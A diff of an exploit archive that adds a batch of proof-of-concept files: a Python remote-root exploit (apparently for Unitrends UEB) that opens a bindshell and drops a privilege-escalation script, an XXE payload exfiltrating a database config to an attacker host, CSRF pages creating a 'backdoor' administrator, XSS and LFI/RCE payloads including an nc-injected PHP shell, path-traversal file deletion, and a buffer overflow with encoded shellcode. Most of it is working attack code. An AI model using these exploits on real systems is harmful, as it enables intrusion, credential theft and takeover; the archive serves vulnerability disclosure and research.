params = urllib.urlencode({'auth' : auth})
params = """{{"name":"bbb","ip":"10.0.0.200'\\"`0&{0}`'"}}""".format(low_priv_cmd)
headers = {'Host' : RHOST,
'Content-Type' : 'application/json',
'X-Requested-With' : 'XMLHttpRequest',
'AuthToken' : auth }
# Establish an HTTPS connection and send the payload.
conn = httplib.HTTPSConnection(RHOST, 443)
conn.set_debuglevel(0)
print "[+] Sending payload to remote host [https://{0}]".format(RHOST)
print "[+] opening low-priv bindshell w/ the following command:"
print "[+] {0}".format(low_priv_cmd)
conn.request("POST", url, params, headers=headers)
r1 = conn.getresponse()
r1.close()
###############################################################################
# STAGE 2: MOVE THE PRIVESC ONTO THE REMOTE BOX!
# The local root RCE exploit below will be printf'd into a file in /tmp
# NB: your command of choice has been inserted into this exploit.
###############################################################################
priv_esc_text = """
import socket
import binascii
import struct
import time
import sys
from optparse import OptionParser
# Parse command line args:
usage = "Usage: %prog -c 'touch /tmp/foooooooooooo'"
parser = OptionParser(usage=usage)
parser.add_option("-c", '--cmd', dest='cmd', action="store",
help="Run a custom command, no reverse shell for you.")
parser.add_option("-x", '--xinetd', dest='xinetd', action="store",
type="int", default=1743,
help="port on which xinetd is running (default: 1743)")
(options, args) = parser.parse_args()
RHOST = '127.0.0.1'
XINETDPORT = options.xinetd
cmd = options.cmd
def recv_timeout(the_socket,timeout=2):
the_socket.setblocking(0)
total_data=[];data='';begin=time.time()
while 1:
#if you got some data, then break after wait sec
if total_data and time.time()-begin>timeout:
break
#if you got no data at all, wait a little longer
elif time.time()-begin>timeout*2:
break
try:
data=the_socket.recv(8192)
if data:
total_data.append(data)
begin=time.time()
else:
time.sleep(0.1)
except:
pass
return ''.join(total_data)
print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
try:
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((RHOST,XINETDPORT))
except:
print "[!] Failed to connect!"
exit()
data = s1.recv(4096)
bpd_port = int(data[-8:-3])
try:
pass
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((RHOST, bpd_port))
except:
print "[!] Failed to connect!"
s1.close()
exit()
print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
print "[+] '{0}'".format(cmd)
cmd_len = chr(len(cmd) + 3)
packet_len = chr(len(cmd) + 23)
packet = '\\xa5\\x52\\x00\\x2d'
packet += '\\x00' * 3
packet += packet_len
packet += '\\x00' * 3
packet += '\\x01'
packet += '\\x00' * 3
packet += '\\x4c'
packet += '\\x00' * 3
packet += cmd_len
packet += cmd
packet += '\\x00' * 3
s1.send(packet)
data = recv_timeout(s2)
print data
s1.close()
#s2.close()
"""
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pe_filename = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16))
pe_filename += ".py"
print "[+] Connecting to ncat bindshell at {0}:{1}.".format(RHOST, str(apache_ncat_port))
try:
s2.connect((RHOST,apache_ncat_port))
except Exception as e:
print "[!] something's wrong with %s:%d. Exception is %s" % (address, port, e)
exit()
print "[+] Transfering privesc script to remote host..."
for line in priv_esc_text.split('\n'):
line = base64.b64encode(line+'\n')
ft_cmd = "echo " + line + " | base64 -d >> /tmp/{0}\n".format(pe_filename)
s2.send(ft_cmd)
print "[+] Executing command:"
print "[+] '{0}'".format(cmd)
high_priv_cmd = "python /tmp/{0} -c '{1}'\n".format(pe_filename, cmd)
s2.send(high_priv_cmd)
print "[+] Cleaning up, removing remote privesc script."
cleanup_cmd = "rm /tmp/{0}\n".format(pe_filename)
s2.send(cleanup_cmd)
print "[+] We did it! :D"
s2.close()

62
exploits/linux/webapps/44430.txt Normal file
View file

@ -0,0 +1,62 @@
#Vendor: KYOCERA Corporation
#Product https://global.kyocera.com
#Affected version: 3.4.0906
#
#Summary: KYOCERA Net Admin is Kyocera's unified
#device management software that uses a web-based
#platform to give network administrators easy and
#uncomplicated control to handle a fleet for up to
#10,000 devices. Tasks that used to require multiple
#programs or walking to each printer can now be
#accomplished in a single, fast and modern environment.
#
#Desc: KYOCERA Multi-Set Template Editor (part of Net
#Admin) suffers from an unauthenticated XML External Entity
#(XXE) injection vulnerability using the DTD parameter
#entities technique resulting in disclosure and retrieval
#of arbitrary data from the affected node via out-of-band
#(OOB) channel attack. The vulnerability is triggered when
#input passed to the Multi-Set Template Editor (kmmted.exe)
#called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll
#is not sanitized while parsing a 5.x Multi-Set template XML
#file.
#
#Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Apache Tomcat/8.5.15
#
#
#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
#
#
#
#Advisory ID: ZSL-2018-5459
#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php
#
#
#28.03.2018
#
#—
#
#
#Malicious.xml:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://192.168.1.71:7777/xxe.xml">
%remote;
%root;
%oob;]>
Attacker's xxe.xml:
<!ENTITY % fetch SYSTEM "file:///C:\Program Files\Kyocera\NetAdmin\Admin\conf\db.properties">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.71:7777/?%fetch;'> ">
Data retrieval:
lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777
Serving HTTP on 0.0.0.0 port 7777 ...
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 -
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 -

83
exploits/linux/webapps/44431.txt Normal file
View file

@ -0,0 +1,83 @@
#Vendor: KYOCERA Corporation
#Product https://global.kyocera.com
#Affected version: 3.4.0906
#
#Summary: KYOCERA Net Admin is Kyocera's unified
#device management software that uses a web-based
#platform to give network administrators easy and
#uncomplicated control to handle a fleet for up to
#10,000 devices. Tasks that used to require multiple
#programs or walking to each printer can now be
#accomplished in a single, fast and modern environment.
#
#Desc: The application interface allows users to perform
#certain actions via HTTP requests without performing
#any validity checks to verify the requests. This can
#be exploited to perform certain actions with administrative
#privileges if a logged-in user visits a malicious web
#site.
#
#Tested on: Microsoft Windows 7 Professional SP1 (EN)
#Apache Tomcat/8.5.15
#
#
#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#@zeroscience
#
#
#Advisory ID: ZSL-2018-5458
#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php
<html>
<head>
<title>KYOCERA Net Admin 3.4 CSRF Add Admin Exploit</title>
</head>
<body onload="exploitrun();">
<!-- Add Administrator -->
<form name="create_user" action="https://192.168.18.133:7443/fwk-web/jsp/addUser.faces" method="POST" target="frame0">
<input type="hidden" name="userType" value="0" />
<input type="hidden" name="addUserForm&#58;loginName" value="backdoor" />
<input type="hidden" name="addUserForm&#58;pw" value="pass123" />
<input type="hidden" name="addUserForm&#58;pwConfirm" value="pass123" />
<input type="hidden" name="addUserForm&#58;role" value="administrator" />
<input type="hidden" name="addUserForm&#58;required&#95;name" value="name" />
<input type="hidden" name="addUserForm&#58;required&#95;email1" value="bd&#64;db&#46;ee" />
<input type="hidden" name="addUserForm&#58;required&#95;role" value="administrator" />
<input type="hidden" name="addUserForm&#58;optional&#95;name" value="Backdoor" />
<input type="hidden" name="addUserForm&#58;company" value="ZSL" />
<input type="hidden" name="addUserForm&#58;department" value="forensics" />
<input type="hidden" name="addUserForm&#58;email2" value="bd2&#64;db&#46;ee" />
<input type="hidden" name="addUserForm&#58;optional&#95;phone" value="123&#45;123&#45;1234" />
<input type="hidden" name="addUserForm&#58;optional&#95;cell" value="321&#45;321&#45;3210" />
<input type="hidden" name="addUserForm&#58;submitHidden" value="true" />
<input type="hidden" name="addUserForm&#95;SUBMIT" value="1" />
<input type="hidden" name="addUserForm&#58;&#95;link&#95;hidden&#95;" value="" />
</form>
<!-- Update Node -->
<form name="update_node" action="https://192.168.18.133:7443/fwk-web/servlet/EventControllerServlet" method="GET" target="frame1">
<input type="hidden" name="bname" value="" />
<input type="hidden" name="ts" value="1522690965730" />
<input type="hidden" name="cmd" value="tv&#95;set&#95;cur&#95;node" />
<input type="hidden" name="node&#95;id" value="root&#46;user&#95;administration&#46;administrator&#46;backdoor" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<script>
function exploitrun()
{
document.create_user.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.update_node.submit();
document.getElementsByTagName("iframe")[1].onload = function()
}
}
</script>
</body>
</html>

16
exploits/multiple/dos/44427.txt Normal file
View file

@ -0,0 +1,16 @@
When a WebAssembly binary is parsed in ModuleParser::parse, it is expected to contain certain sections in a certain order, but can also contain custom sections that can appear anywhere in the binary. The ordering check validateOrder() does not adequately check that sections are in the correct order when a binary contains custom sections.
static inline bool validateOrder(Section previous, Section next)
{
if (previous == Section::Custom)
return true;
return static_cast<uint8_t>(previous) < static_cast<uint8_t>(next);
}
If the previous section was a custom section, the check always returns true, even if the section is otherwise out of order. This means any number of sections can be parsed from a binary, any number of times in any order. This leads to a number of possible overflows and type confusion bugs, as parsing assumes most sections are unique and in the right order.
The attached html file causes a crash in Safari, the wasm file is attached as well. This particular use of the bug causes an overflow in the function vector.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44427.zip

64
exploits/php/webapps/44418.txt Normal file
View file

@ -0,0 +1,64 @@
#######################################
# Exploit Title: WolfCMS 0.8.3.1 Cross Site Request Forgery
# Google Dork: N/A
# Date: 04-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.wolfcms.org
# Software Link:
https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip
# Affected Version: 0.8.3.1
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-8814
#
# 1. Vendor Description:
#
# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended
CMS. Uses MySQL, SQLite or (from 0.7)
# PostgreSQL for db. Simple drag & drop page hierarchy. Open source,
licensed under GPLv3.
#
# 2. Technical Description:
#
# Cross-site request forgery (CSRF) vulnerability in WolfCMS before 0.8.3.1
allows remote attackers to hijack the
# authentication of users for requests that modify
plugin/[pluginname]/settings and can uninstall plugins by sending
# malicious request.
#
# 3. Proof Of Concept:
#
# Send below request to logged in user to change the plugin settings.
#
#<html>
# <body>
# <form action="http://[URL]/wolf/wolfcms/?/admin/plugin/archive/save"
method="POST">
# <input type="hidden" name="settings&#91;use&#95;dates&#93;"
value="1" />
# <input type="hidden" name="commit" value="Save" />
# <input type="submit" value="Submit request" />
# </form>
# <script>
# document.forms[0].submit();
# </script>
# </body>
#</html>
#
# Share the below URL to uninstall any plugin remotely.
#
# http://[url]/wolfcms/?/admin/setting/uninstall_plugin/[pluginname]
#
#
# 4. Solution:
#
# Upgrade to latest release.
# http://www.wolfcms.org/blog.html
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8814
# https://github.com/wolfcms/wolfcms/issues/671
#####################################

25
exploits/php/webapps/44419.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: [Cobub Razor 0.7.2 Add New Superuser User]
# Date: [2018-03-07]
# Exploit Author: [ppbppb@5ecurity.cn]
# Vendor Homepage: [https://github.com/cobub/razor/]
# Software Link: [https://github.com/cobub/razor/]
# Version: [0.72]
# CVE : [CVE-2018-7745]
There is a vulnerability that can add an admnistrator user without login.
update the url and save to html then open it.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
<input type="hidden" name="siteurl" value="http://127.0.0.1/" />
<input type="hidden" name="superuser" value="test" />
<input type="hidden" name="pwd" value="test123" />
<input type="hidden" name="verifypassword" value="test123" />
<input type="hidden" name="email" value="12@qq.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

16
exploits/php/webapps/44420.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: MyBB Recent threads
# Date: 4th April 2018
# Exploit Author: Perileos
# Software Link: https://community.mybb.com/mods.php?action=view&pid=191
# Version: 17.0
# Tested on: Windows 10
1. Description:
This plugin shows recent threads in the side bar on your MyBB forum.
2. Proof of concept:
Persistent XSS
- Create a thread with the following subject <p
"""><SCRIPT>alert("XSS")</SCRIPT>">
- Navigate to the index to see a board wide persistent XSS alert.

42
exploits/php/webapps/44421.txt Normal file
View file

@ -0,0 +1,42 @@
#######################################
# Exploit Title: WolfCMS 0.8.3.1 Open Redirection Vulnerability
# Google Dork: N/A
# Date: 04-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.wolfcms.org
# Software Link: https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip
# Affected Version: 0.8.3.1
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-8813
#
# 1. Vendor Description:
#
# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended CMS. Uses MySQL, SQLite or (from 0.7)
# PostgreSQL for db. Simple drag & drop page hierarchy. Open source, licensed under GPLv3.
#
# 2. Technical Description:
#
# Open redirect vulnerability in the login[redirect] parameter login
functionality in WolfCMS before 0.8.3.1 allows
# remote attackers to redirect users to arbitrary web sites and conduct
phishing attacks via a malformed URL.
#
# 3. Proof Of Concept:
#
# Navigate to http://[URL]/wolfcms/?/admin/login
# Enter the credentials and replace login[redirect] to any url.
# You can see the unvalidated redirect.
#
# 4. Solution:
#
# Upgrade to latest release.
# http://www.wolfcms.org/blog.html
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8813
# https://github.com/wolfcms/wolfcms/issues/670
#####################################

66
exploits/php/webapps/44424.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
# Google Dork: intitle:"Proberv0." | inurl:/proberv.php
# Date: 23/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: http://www.yahei.net/
# Software Link: www.yahei.net/tz/tz_e.zip
# Version: 0.4.7
# CVE: CVE-2018-9238
# Tested on: Windows 10 / Kali Linux
# Category: Webapps
#1. Description
-----------------------------------------------------
proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.
#2. Proof of Concept
-----------------------------------------------------
Request:
POST /proberv.php HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: <target>/proberv.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Connection: close
Upgrade-Insecure-Requests: 1
pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=
-----------------------------------------------------
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 16:59:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 30461
...
<tr>
<td width="15%"></td>
<td width="60%">
Enter the function you want to test:
<input type="text" name="funName" size="50" />
</td>
<td width="25%">
<input class="btn" type="submit" name="act" align="right" value="Function
Test" />
</td>
</tr>
<script>alert('Function')</script><script>alert("1");</script>Test results
support the position: 错误')</script></table>
#3. References
-----------------------------------------------------
https://pastebin.com/ia7U4vi9
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238

42
exploits/php/webapps/44425.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
# Date: 2018-04-08
# Exploit Author: Graeme Robinson
# Contact: @Grasec
# Vendor Homepage: http://simple-fields.com
# Software Link: https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip
# Version: 0.2 - 0.3.5
# Tested on: Ubuntu 16.04.4 + PHP 5.3.0
# Category: webapps
1. Description
Versions 0.2 to 0.3.5 of the Simple Fields WordPress plugin are vulnerable to local file inclusion if running on PHP <5.3.4. This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini.
PHP <5.3.4 is required because the exploit relies on the ability to inject a null byte to terminate a string before the script expects it to be and this was fixed in PHP 5.3.4
The vulnerability was fixed (commented out) in version 0.3.6 on 2011-02-03. Simple Fields is no longer actively developed, since 2016-02-27 (http://simple-fields.com/2016/bye-bye-simple-fields/)
The vulnerable line of code in simple_fields.php is:
require( $_GET["wp_abspath"] . './wp-blog-header.php' );
2. Proof of concept
LFI:
http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
RCE:
$ echo "<?system(\$_GET['cmd'])?>"|nc host 80
$ curl "http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=../../../../../logs/access_log%00&cmd=id"
3. Solutions:
* Upgrade PHP to 5.3.4+
* Update Simple Fields to 0.3.6+
* Stop using Simple Fields because it is no longer supported
4. Relevant Links:
* http://simple-fields.com
* https://wordpress.org/plugins/simple-fields/
* https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip
* https://github.com/bonny/WordPress-Simple-Fields

47
exploits/php/webapps/44432.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Plugin Buddypress Xprofile Custom Fields Type 2.6.3 RCE Unlink
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage:
# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/
# Software Link:
# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 2.6.3
# Tested on: Ubuntu 16.1
#
#Article:
#http://lenonleite.com.br/publish-exploits/plugin-buddypress-xprofile-custom-fields-type-2-6-3-rce-unlink/
#
#Video:
#https://www.youtube.com/watch?v=By7kT7UbHVk
#
1 - Description
- Type user access: any user registered used in BuddyPress.
- $_POST[ 'field_' . $field_id . '_hiddenfile' ] is not escaped.
- $_POST[ 'field_' . $field_id . '_deleteimg' ] is not escaped.
2. Proof of Concept
Login as regular user.
1- Log in with BuddyPress User
2 - Access Edit Profile:
http://target/members/admin/profile/edit/
3 - Register data with image:
<http://target/wp-content/uploads/2018/01/buddypress-profile.png>4
- Change parameter to delete image in html and save profile:
<http://target/wp-content/uploads/2018/01/buddypress-profile2.png>
<http://target/wp-content/uploads/2018/01/buddypress-profile3-1.png>
#--
#*Atenciosamente*
#
#*Lenon Leite*

35
exploits/php/webapps/44433.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Plugin Woocommerce CSV importer 3.3.6 RCE Unlink
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: *https://wordpress.org/plugins/woocommerce-csvimport/
# Software Link: *https://wordpress.org/plugins/woocommerce-csvimport/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 3.3.6
# Tested on: Ubuntu 16.1
#
1 - Description
- Type user access: any user registered.
- $_POST['filename'] is not escaped.
2. Proof of Concept
<form method="post"
action="http://target/wp-admin/admin-ajax.php?action=delete_export_file">
<input type="text" name="filename" value="../wp-config.php">
<input type="submit">
</form>
- Date Discovery : *11/23/2017*
- Date Vendor Contact : *12/29/2017*
- Date Publish : 08/04/2018
- Date Resolution :
#*Atenciosamente*
#
#*Lenon Leite*

65
exploits/php/webapps/44434.txt Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: iScripts SonicBB 1.0 - Reflected Cross-Site Scripting
# Date: 02/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Demo Page: https://www.demo.iscripts.com/sonicbb/demo/
# Version: 1.0
# Tested on: Windows 10
# Category: Webapps
# CVE: CVE-2018-9235
1. Description
====================
iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query
parameter to search.php
2. PoC
====================
Request:
GET
/sonicbb/demo/search.php?query=%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E
HTTP/1.1
Host: www.demo.iscripts.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=227100805.298811387.1522637403.1522637403.1522637403.1;
__utmb=227100805; __utmc=227100805;
__utmz=227100805.1522637403.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);
PHPSESSID=grh7l3amrvhoapig8ll268l9o4;
messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; hs-messages-is-open=false
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Mon, 02 Apr 2018 02:58:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 3619
...
<tr>
<td width="76%" class="alt1"><a href="index.php">iScripts Forum</a> ->
<a href="search.php?query="><script>alert('1')</script>">Search</a></td>
<td width="24%" align="center" class="alt1">
<form method="GET" action="search.php" style="display: inline">
<input type="text" name="query" size="12" style="font-size: 10px">
<input type="submit" value="Search" style="font-size: 10px">
</form>
</td>
</tr>
...
3. References
====================
https://pastebin.com/caQW37fY
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9235

34
exploits/php/webapps/44435.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Plugin Google Drive for WordPress 2.2 RCE Unlik
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: *https://wordpress.org/plugins/wp-google-drive/
# Software Link: *https://wordpress.org/plugins/wp-google-drive/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 2.2
# Tested on: Ubuntu 16.1
1 - Description
- Type user access: Don't need of login .
- $_POST[file_name] is not escaped.
2. Proof of Concept
1 - Send data form:
<form method="post"
action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
<input type="text" name="ajaxstype" value="del_fl_bkp">
<input type="text" name="file_name" value="../../wp-config.php">
<input type="text" name="id" value="1">
<input type="submit">
</form>
# - Date Discovery : *11/25/2017*
# - Date Vendor Contact : *12/26/2017*
# - Date Publish : 08/04/2018
# - Date Resolution :

68
exploits/windows/local/44423.py Executable file
View file

@ -0,0 +1,68 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)
# Date: 04-05-2018
# Vulnerable Software: GoldWave 5.70
# Vendor Homepage: https://www.goldwave.com/
# Version: 5.70
# Software Link: http://goldwave.com//downloads/gwave570.exe
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate goldwave570.txt, copy contents to clipboard
# 2. open gold wave app
# 3. select File, Open URL...
# 4. paste contents from clipboard after 'http://'
# 5. select OK
# 6. pop calc
#
filename="goldwave570.txt"
junk = "\x71"*1019
#popad
nseh = "\x61\x62"
#0x006d000f : pop ecx # pop ebp # ret | startnull,unicode,ascii {PAGE_EXECUTE_READ} [GoldWave.exe]
seh = "\x0f\x6d"
valign = (
"\x53" #push ebx
"\x47" #align
"\x58" #pop eax
"\x47" #align
"\x05\x16\x11" #add eax,600
"\x47" #align
"\x2d\x13\x11" #sub eax,300
"\x47" #align
"\x50" #push eax
"\x47" #align
"\xc3" #retn
)
#nops to shellcode
nops = "\x71" * 365
#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
#Payload size: 517 bytes
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AA"
"PAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIXTBKPM0M0S0DIK501I0C44"
"K0PP0DKPRLLTKQBMDTKBRO8LOFWOZMV01KOFLOLS13LLBNLO0WQXOLMKQI7K2KB0RQGTKPRN0DK0J"
"OL4K0LN1CHISOXKQXQ214K0YMPKQJ3DK0IN8K3NZOYTKNT4KM1YFNQKO6L91XOLMM1WW08IP45ZVK"
"S3MZXOKSMMTRUK4B8TKPXO4M1YCBFDKLLPKDKR8MLM1YC4KKTTKM18PU9PDO4MT1K1KQQR91J0QKO"
"IP1O1O1J4KN2ZK4MQMRJM14MSUVRM0M0M0PP2HNQTKROSWKO8UWKZPH55R1FQX6FF5WMEMKOXUOLL"
"F3LKZE0KKYPRUM5GKOWMCCBRO2JM023KOYE1S1QRLBCNNRERX1UM0AA")
fill = "\x71"* 5000
buffer = junk + nseh + seh + valign + nops + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

19
files_exploits.csv
View file

@ -5923,6 +5923,8 @@ id,file,description,date,author,type,platform,port
44397,exploits/windows/dos/44397.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy (Incomplete Fix) (2)",2018-04-03,"Google Security Research",dos,windows,
44402,exploits/windows/dos/44402.txt,"Microsoft Windows Defender - 'mpengine.dll' Memory Corruption",2018-04-05,"Google Security Research",dos,windows,
44404,exploits/windows/dos/44404.html,"Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods",2018-04-05,"Google Security Research",dos,windows,
44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple,
44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9635,6 +9637,9 @@ id,file,description,date,author,type,platform,port
44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
44410,exploits/windows/local/44410.txt,"Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass",2018-04-06,hyp3rlinx,local,windows,
44411,exploits/windows/local/44411.txt,"Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption",2018-04-06,hyp3rlinx,local,windows,
44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java,
44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows,
44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16374,6 +16379,7 @@ id,file,description,date,author,type,platform,port
44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows,
44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux,
44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows,
44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux,
44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
@ -39113,3 +39119,16 @@ id,file,description,date,author,type,platform,port
